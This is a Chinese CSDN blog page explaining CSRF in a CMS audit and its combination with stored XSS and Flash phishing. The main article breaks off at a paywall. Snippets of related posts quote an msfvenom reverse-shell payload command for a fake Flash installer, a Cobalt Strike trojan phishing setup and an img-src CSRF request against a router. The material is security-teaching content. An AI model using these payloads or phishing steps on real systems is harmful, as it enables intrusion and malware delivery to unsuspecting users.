实战审计cms之CSRF——CSRF+Xss+Flash钓鱼

最新推荐文章于 2024-07-23 22:58:33 发布
最新推荐文章于 2024-07-23 22:58:33 发布
阅读量547 收藏 3
点赞数
分类专栏: 实纪实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/116977999
版权
本文深入浅出地介绍了CSRF(跨站请求伪造)的概念,通过本地靶场演示了CSRF的利用过程,展示了如何利用CSRF漏洞在CMS中添加友链。同时,文章还提及了XSS和Flash钓鱼的结合,强调了防范措施的重要性,如二次校验、校验token等。
摘要由CSDN通过智能技术生成 
更多渗透技能  欢迎搜索公众号:白帽子左一

作者:掌控安全-holic

前言

CSRF感觉似乎很不值钱的样子,我前几天审计出了3个后台存储xss+csrf

然后cnvd跟我说不收csrf和后台存储xss,自此后台我从不找xsscsrf

但是毕竟作为目前毕竟出名流行的一个漏洞,还是讲解一下,我会讲的很简单,ojbk

图片

0x01 CSRF介绍

CSRF的全名为Cross-site request forgery,它的中文名为 跨站请求伪造

CSRF是一种夹持用户在已经登陆的web应用程序上执行非本意的操作的攻击方式。

1).CSRF是利用了系统对页面浏览器的信任

2).XSS则利用了系统对用户的信任。

原理:

攻击者盗用了你的身份,以你的名义发送恶意请求

CSRF能够做的事情有:

以你的名义发送邮件、发消息、盗取你的账号,甚至于购买商品,虚拟货币转账

0x02.本地靶场演示csrf

这个cms是我找的,提交cnvd不收,我就拿出来讲QAQ

cms下载地址:http://down.chinaz.com/soft/39546.htm

图片

因为存在csrf和xss,然后刚好想到这里友链有csrfxss

那我们就直接制作一个po

最低0.47元/天 解锁文章
zkzq
关注
专栏目录
代码审计csrf,ssrf
willow_liang的博客
11-12 571
CSRF (Cross -site request forgery)跨站请求伪造 csrf原理: 攻击者盗用了你的身份,以你的名义向第三方网站发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件,发私信,添加管理用户,甚 至于交易转账等。 攻击者在用户浏览网页时,利用页面元素(例如img的src),强迫受害者的浏览器向Web应用程序发送一个改变用户信息的请求。由于发生CSRF攻击后,攻击者是强迫用户向服务器发送请求,所以会造成用户信 息被...
xxs-flash-钓鱼
qq_38618396的博客
12-27 780
0x00 准备 1、源码:https://github.com/r00tSe7en/Fake-flash.cn 2、域名:一个和flash相近的域名和一台服务器 3、木马:cobalstrike生成木马 4、其他:flash安装包 0x01 实际操作 搭建环境 第一步:下载源代码,直接在使用phpstudy搭建一个网站: 第二步:启动cs,制作木马 使用cs生成一个木马 第三步:下载flash安装程序 在这里插入图片描述 ...
网络攻防|XSS Flash弹窗钓鱼
weixin_42282189的博客
11-15 2865
作者: Overture 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 xss弹出flash更新是一种常见的钓鱼手法,本文介绍一下整体思路和部分技术细节。 注意:任何未经授权的渗透都是违法行为,本文仅用于技术讨论,切勿用于违法途径 前期准备 服务器及域名 flash页面 免杀木马 前提条件:目标网站存在存储型xss漏洞或者已经getshell能够修改源码,通过请求你插入的js代码触发flash升级弹窗,跳转到准备好的flash下载界面下载安装,触发木马上线cs.
XSS-Flash攻击钓⻥
最新发布
2401_85783544的博客
07-23 372
进⼀步对提供下载的Flash⽂件进⾏伪装,在真的Flash官⽹下载安装程序并在kali使⽤msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > shell.exe。点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏",配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。
CSRF钓鱼链接攻击
球球的博客
03-20 5896
CSRF发生的原理和过程,验证Referer这种不靠谱的防御即绕过
Xss——Flash钓鱼
weixin_56291508的博客
04-22 755
Xss——Flash钓鱼
Django之CSRF跨站请求伪造(老掉牙的钓鱼网站模拟)
ama7790的博客
04-23 206
首先这是一个测试的代码 请先在setting页面进行下面操作 注释完成后,开始模拟钓鱼网站的跨站请求伪造操作: 前端代码: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</tit...
PHP代码审计基础:CSRF漏洞
1匹黑马
11-28 449
文章目录CSRF漏洞危害挖掘思路环境搭建实施攻击攻击条件修复方案 CSRF CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。 如下:其中Web A为存在CSRF漏洞的网站,Web B为攻击者构建的恶意网站,Use
[红日安全]Web安全Day2 - XSS跨站实战攻防
hongrisec的博客
02-20 940
本文由红日安全成员: Aixic 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫Web安全实战,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Pytho...
web漏洞利用---XSS注入攻击
m0_65129142的博客
12-20 5451
XSS漏洞简介 XSS注入漏洞又称为"跨站脚本攻击(Cross Site Scripting)",为了不和层叠样式表(Cascading Style Sheets,CSS)混淆,所以将跨站脚本攻击缩写为XSSXSS注入攻击的原理其实和SQL注入攻击的原理很相似,攻击者将恶意的Script代码插入到网页中,当正常用户浏览该页面时,被嵌入的恶意Script代码就会被执行,从而达到恶意攻击正常用户的目的。 XSS分类 跨站脚本注入漏洞是由于WEB服务器读取了用户可控数据输出到HTML页面的过程中没有进行安全处理
2023年网络安全岗面试跳槽看这一篇就够了(含面试题+大厂面经分享)
m0_71743066的博客
03-10 1506
又到了一年一度的金三银四面试季,想必有些朋友的心已经开始躁动了,毕竟跳槽涨薪的幅度远高于内部调薪的幅度!以下为网络安全各个方向涉及的面试题以及安全大厂的面经汇总,星数越多代表问题出现的几率越大,祝各位都能找到满意的工作。注:本套面试题及面经,已整理成pdf文档,但内容还在持续更新中,因为无论如何都不可能覆盖所有的面试问题,更多的还是希望由点达面,查漏补缺,希望对大家有帮助。
CSRF跨站点伪造请求攻击之——CSRF钓鱼添加管理员账号及安全防范
温柔小薛的博客
04-11 735
CSRF钓鱼添加管理员账号及安全防范 本地网络设备 CSRF 攻击 一般情况下,外网不可以访问,交换机等硬件也是,如果想访问内网设备,应该怎么办呢,注意,内网设备很多是默认密码的 首先,模拟正常用户身份登录,进入到路由器中开启web管理端口,再用burp抓包,抓取得到地址 <img src=http://192.168.1.1/userRpm/ManageControlRpm.htm?po...
PHP代码审计 ------------CSRF漏洞
qq_62344745的博客
04-17 225
CSRF( Cross-site request forgery)跨站请求伪造,也有人写出XSRF。黑客伪造用户木匾用户的HTTP请求。然后将这个HTTP请求发送给存在CSRF的网站,有CSRF的网站执行了伪造的HTTP请求,就引发了跨站请求伪造相对来说,比xss更具有危害性,
PHP代码审计 ----- CSRF漏洞
qq_62344745的博客
05-05 151
验证有没有token值,有没有http头的referer 的。
csrf漏洞php代码审计1
m0_55772907的博客
04-30 265
(1)原理 当我们打开或登录某个网站,浏览器与网站所存放的服务器会产生一个会话,之后一段时间,所有通过这个认证会话的请求,都会被视为可信的动作,比如此时你正登录网上银行,正在转账,此时攻击者构造恶意转账代码,当你不小心点击它时,就会完成相应的转账操作,因为此时浏览器认为这是可信的正常操作。 (2)分类dvwa low 我们可以看到low难度的源代码中,并没有添加token,且修改密码是通过get请求发送,该修改请求可以构造 。 medium 前端代码还是一样的,没有添加token,分析.
XSS另类攻击(五)Flash钓鱼配合MSF捆绑上线
06-02 960
一文告诉你如何Flash钓鱼配合MSF捆绑上线。
基于YzmCMSCSRF
weixin_30852419的博客
05-04 284
1.自己创建环境,然后使用管理员添加用户。    2.新加用户时,使用burp抓包。尝试把POST方法转变成GET方法,发现不可成功。 3.然后自己构造POC ,这里使用burp生成    4.把生成的CSRF的POC复制出来,保存为一个html 的文件,诱惑管理员去点击。管理员点击后就会创建一个有管理员权限的用户了。 5.这里本地去测试一下。 6.当管理...
Web安全实验:跨站攻击(XSS+CSRF)原理与实战
实验内容包括使用Kali Linux工具对DVWA的XSSCSRF漏洞进行实战操作,同时要求理解各种级别的攻击以及修复策略。实验报告应详细记录整个过程,包括攻击步骤、观察结果和修复建议。 在进行此类实验时,重要的是要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值